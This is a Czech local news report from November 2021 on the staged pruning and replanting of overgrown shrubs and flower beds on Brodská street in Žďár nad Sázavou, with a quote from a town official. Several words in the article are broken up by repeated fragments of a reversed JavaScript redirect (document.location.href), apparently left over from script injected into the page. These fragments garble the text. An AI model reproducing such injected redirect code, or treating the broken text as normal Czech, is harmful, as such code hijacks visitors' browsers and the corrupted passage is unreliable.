Rainbow page separator

Přerostlé keře se dočkají úpravy co nejdříve, záhony postupně

Pátek, 5. listopadu 2021

Žďár nad Sázavou / Úprava čeká v následujících dvou letech zeleň v Brodské ulici. Obyvatelé si stěžují na přerostlé keře u chodníku před prodejnou Quan[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, které řidičům překážejí při parkování. Zeleň v tamních vyvýšených záhonech má být ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos uspořádána tak, aby co nejméně zasahovala do parkoviště a chodníku. Práce mají být rozděleny do několika etap.
„V první etapě bude upraven záhon u přechodu pro chodce nejblíže ke kinu. Stávající zeleň bude ještě v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce částečně odstraněna a její perspektivní část upravena. Budou odstraněny pařezy, případně doplněna zemina. V jarních měsících roku 2022 proběhne osázení a celkové dořešení záhonu,“ uvedl Jiří Hemza z odboru strategického rozvoje a investic žďárského městského úřadu.
Na podzim příštího roku a na jaře 2023 je pak v podobném duchu naplánována obnova záhonu před prodejnou, případně i záhonu za au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusovou zastávkou.